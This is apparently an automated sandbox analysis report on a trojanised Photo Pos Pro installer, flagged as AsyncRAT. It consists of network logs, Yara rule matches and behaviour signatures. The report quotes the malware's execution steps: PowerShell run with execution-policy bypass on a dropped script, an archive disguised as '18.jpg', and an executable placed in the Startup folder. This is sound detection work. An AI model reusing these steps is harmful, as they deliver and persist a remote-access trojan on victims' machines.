                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50319 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50275 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50395
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50293
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50283 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50334 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50323 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50310 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50322 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50333 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50344 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 172.64.145.29:443 -> 192.168.2.4:49745 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000029.00000002.2632261020.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_004105BF GetDC,GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,ReleaseDC,DeleteDC,SelectObject,DeleteDC,GetDC,BitBlt,ReleaseDC,DeleteObject,6_2_004105BF
                  Source: PhotoPosPro4_SetUp.exeBinary or memory string: DirectInput8Create

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                  Source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                  Source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                  Source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                  Source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 00000029.00000002.2632261020.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                  Source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Powershell drops PE file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeJump to dropped file
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "tar -xf 18.jpg -C $env:public"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Move-Item -Path '18.jpg' -Destination $env:public"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "tar -xf 18.jpg -C $env:public" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Move-Item -Path '18.jpg' -Destination $env:public" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00360610 NtdllDefWindowProc_W,0_2_00360610
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001C8110 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,0_2_001C8110
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_002AE5A0 NtdllDefWindowProc_W,0_2_002AE5A0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001C87C0 NtdllDefWindowProc_W,0_2_001C87C0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001D28D0 NtdllDefWindowProc_W,0_2_001D28D0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001E0960 NtdllDefWindowProc_W,0_2_001E0960
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001CA9C0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,0_2_001CA9C0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001D2A40 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_001D2A40
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001EED10 NtdllDefWindowProc_W,0_2_001EED10
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001DAF60 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_001DAF60
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001CB1B0 NtdllDefWindowProc_W,0_2_001CB1B0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001CB810 NtdllDefWindowProc_W,0_2_001CB810
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001C7940 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_001C7940
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00243AC0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00243AC0
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0040F95D: DeviceIoControl,DeviceIoControl,DeviceIoControl,6_2_0040F95D
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00413C08 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_00413C08
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_00413C08 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,14_2_00413C08
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\52abb2.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAD0A.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADB6.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADF6.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAE26.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAE65.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAEA5.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{04931511-D7E0-46E1-B3DF-925E756332C6}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD3A.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD6A.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID50C.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\52abb5.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\52abb5.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID78E.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID82B.tmpJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile created: C:\Windows\Photo Pos Pro 4 Uninstaller.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIAD0A.tmpJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033E0900_2_0033E090
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003582B00_2_003582B0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003402E00_2_003402E0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0031C3B00_2_0031C3B0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003769700_2_00376970
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0032AC000_2_0032AC00
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F4C800_2_001F4C80
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0032ED000_2_0032ED00
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001B14900_2_001B1490
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001E15D00_2_001E15D0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003EA01F0_2_003EA01F
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003760600_2_00376060
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001B7A000_2_001B7A00
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F04300_2_001F0430
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003624000_2_00362400
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003EA45E0_2_003EA45E
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003804800_2_00380480
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001E85600_2_001E8560
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001E46630_2_001E4663
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_002487D00_2_002487D0
